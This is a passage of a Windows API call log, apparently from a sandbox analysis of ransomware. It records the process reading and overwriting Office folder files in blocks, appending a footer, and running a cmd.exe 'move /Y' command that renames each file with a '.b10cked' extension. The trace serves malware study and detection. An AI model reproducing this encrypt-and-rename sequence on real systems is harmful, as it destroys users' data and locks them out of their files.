lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.834] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.834] ReleaseMutex (hMutex=0xf8) returned 1 [0167.834] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.834] ReleaseMutex (hMutex=0xf8) returned 1 [0167.834] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.834] ReleaseMutex (hMutex=0xf8) returned 1 [0167.834] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.834] ReleaseMutex (hMutex=0xf8) returned 1 [0167.834] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22462398072) returned 1 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x7b60 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7b60 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.836] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x7678 [0167.836] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x7b60 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.070] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x7b60 [0168.071] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.071] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.071] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3daf, lpOverlapped=0x0) returned 1 [0168.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.128] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0168.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15791, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3db1 [0168.128] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3daf, lpOverlapped=0x0) returned 1 [0168.129] SetFilePointer (in: hFile=0x114, lDistanceToMove=-15791, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3db1 [0168.129] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0168.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0168.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0168.135] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x7b60 [0168.135] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0168.135] CloseHandle (hObject=0x114) returned 1 [0168.274] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX") returned 0x3c [0168.275] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0168.275] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x888, dwThreadId=0x898)) returned 1 [0168.295] CloseHandle (hObject=0x1b4) returned 1 [0168.295] CloseHandle (hObject=0x114) returned 1 [0168.296] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.296] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0168.296] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0168.296] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.296] ReleaseMutex (hMutex=0xf8) returned 1 [0168.296] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.296] ReleaseMutex (hMutex=0xf8) returned 1 [0168.296] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.296] ReleaseMutex (hMutex=0xf8) returned 1 [0168.296] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0168.296] ReleaseMutex (hMutex=0xf8) returned 1 [0168.296] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0168.296] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22508586466) returned 1 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3d960 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0168.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3d478 [0168.298] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3d960 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3d960 [0168.338] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0168.339] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.339] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.412] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.433] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xcaf, lpOverlapped=0x0) returned 1 [0168.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0168.440] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.440] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0168.440] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xcaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xcaf, lpOverlapped=0x0) returned 1 [0168.441] SetFilePointer (in: hFile=0x114, lDistanceToMove=-126127, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ecb1 [0168.441] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.441] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0168.471] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xcaf, lpOverlapped=0x0) returned 1 [0168.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=-126127, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ecb1 [0168.472] WriteFile (in: hFile=0x114, 